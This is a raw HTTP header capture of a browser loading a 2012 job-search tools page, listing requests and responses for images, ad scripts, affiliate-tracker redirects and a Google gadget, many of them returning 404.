User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Location: http://www.yceml.net/0021/10484757-6.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:17 GMT
GET /image-1839237-10361944 HTTP/1.1

Host: www.afcyhf.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.afcyhf.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Location: http://www.yceml.net/0088/10361944-9.gif
Content-Length: 78
Cneonction: close
Date: Wed, 07 Nov 2012 16:21:17 GMT
GET /image-1839237-10298072 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Location: http://www.yceml.net/0728/10298072-20.jpg
Content-Length: 79
Cneonction: close
Date: Wed, 07 Nov 2012 16:21:17 GMT
GET /ig/images/plus_google.gif HTTP/1.1

Host: www.gmodules.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT
Date: Wed, 07 Nov 2012 16:21:17 GMT
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1531
X-XSS-Protection: 1; mode=block
GET /gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&container=open&view=home&lang=all&country=ALL&debug=0&nocache=0&sanitize=0&v=232824d3a7ae247c&source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&libs=core%3Acore.io HTTP/1.1

Host: www-open-opensocial.googleusercontent.com
GET /gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: CP=&quot;CAO PSA OUR&quot;
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 16:21:17 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 3336
Server: GSE
GET /jobsearchtools.html/186/images/clouds4_03.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=397
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/motif02.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=397
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/company.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=397
Connection: Keep-Alive
GET /gadgets/js/core:core.io.js?container=open&nocache=0&debug=0&c=0&v=99d2adde813b852edea8833e2cb500c8&sv=9&jsload=0 HTTP/1.1

Host: www-open-opensocial.googleusercontent.com
GET /gadgets/js/core:core.io.js?container=open&amp;nocache=0&amp;debug=0&amp;c=0&amp;v=99d2adde813b852edea8833e2cb500c8&amp;sv=9&amp;jsload=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Expires: Fri, 01 Nov 2013 01:09:43 GMT
Content-Encoding: gzip
Date: Thu, 01 Nov 2012 01:09:43 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public,max-age=31536000
Content-Length: 13502
Age: 573094
GET /jobsearchtools.html/186/images/clouds4_06.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=396
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/top_back.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=397
Connection: Keep-Alive
GET /nw/preview.php?wid=3587&IFR=1 HTTP/1.1

Host: www.myresellrightsgoldmine.com
GET /nw/preview.php?wid=3587&amp;IFR=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/9.74
Content-Length: 597
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /pagead/js/r20121031/r20120730/show_ads_impl.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 5206557930112377484
Date: Tue, 06 Nov 2012 19:40:17 GMT
Expires: Tue, 20 Nov 2012 19:40:17 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 19221
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 74460
GET /a/jbb/find-jobs-json/jbb_widget_list_jobposts/3 HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Wed, 07 Nov 2012 16:21:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: gc=1; expires=Thu, 08-Nov-2012 16:21:16 GMT; path=/ shup=fvt%3D509a8a7c%26ncs%3D1%26lst%3D509a8a7d; expires=Fri, 07-Dec-2012 16:21:17 GMT; path=/ sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; expires=Mon, 06-Nov-2017 16:21:16 GMT; path=/ sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1; expires=Wed, 07-Nov-2012 16:51:16 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Encoding: gzip
GET /jobsearchtools.html/186/images/motif01.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=396
Connection: Keep-Alive
GET /pagead/osd.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io
If-None-Match: 13350759849962699205
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 6549576333968007708
Date: Wed, 07 Nov 2012 16:09:12 GMT
Expires: Wed, 07 Nov 2012 17:09:12 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5986
X-XSS-Protection: 1; mode=block
Age: 725
Cache-Control: public, max-age=3600
GET /bird/?u=betterjobsearch HTTP/1.1

Host: button.twittercounter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/png
Server: Apache/2.2.17 (Fedora)
Last-Modified: Wed, 07 Nov 2012 16:12:41 GMT
Cache-Control: max-age=600
Expires: Wed, 07 Nov 2012 16:22:41 GMT
Content-Length: 12285
Accept-Ranges: bytes
Date: Wed, 07 Nov 2012 16:21:17 GMT
Age: 516
Connection: keep-alive
X-Cache: HIT
GET /image-1839237-10484790 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:18 GMT
Location: http://www.yceml.net/0054/10484790-8.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:17 GMT
GET /ads/images/blankblue-button-140.png HTTP/1.1

Host: www.allstarjobs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:33:51 GMT
Server: Apache
Last-Modified: Wed, 09 May 2012 13:53:45 GMT
Etag: &quot;2446a4-291-4bf9ad4eccc40;4c98600db1100&quot;
Accept-Ranges: bytes
Content-Length: 657
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/01a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=396
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/02a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=396
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/03a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=396
Connection: Keep-Alive
GET /ads/images/hired-stamp.jpg HTTP/1.1

Host: www.allstarjobs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:33:51 GMT
Server: Apache
Last-Modified: Wed, 09 May 2012 13:53:46 GMT
Etag: &quot;2446a8-1a9a-4bf9ad4fc0e80;4c98600db1100&quot;
Accept-Ranges: bytes
Content-Length: 6810
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=zfq9BF98FFM.no./sv=1/am=!R7JhevK68w2IwTSFZw/d=1/rs=AItRSTOFOTeV3g2f5Xg8Wf3esjJMS5F10g/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;1509811931&quot;
Expires: Fri, 07 Dec 2012 02:13:02 GMT
Date: Wed, 07 Nov 2012 02:13:02 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 27849
Age: 50896
GET /ads/images/asj-logo-158x33.png HTTP/1.1

Host: www.allstarjobs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:33:51 GMT
Server: Apache
Last-Modified: Wed, 09 May 2012 13:53:44 GMT
Etag: &quot;24469c-1374-4bf9ad4dd8a00;4c98600db1100&quot;
Accept-Ranges: bytes
Content-Length: 4980
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /pagead/expansion_embed.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 2372832783343406230
Date: Wed, 07 Nov 2012 01:12:23 GMT
Expires: Thu, 08 Nov 2012 01:12:23 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 25450
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 54535
GET /jobsearchtools.html/186/images/04a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=395
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/05a.jpg HTTP/1.1

Host: www.betterjobsearch.com

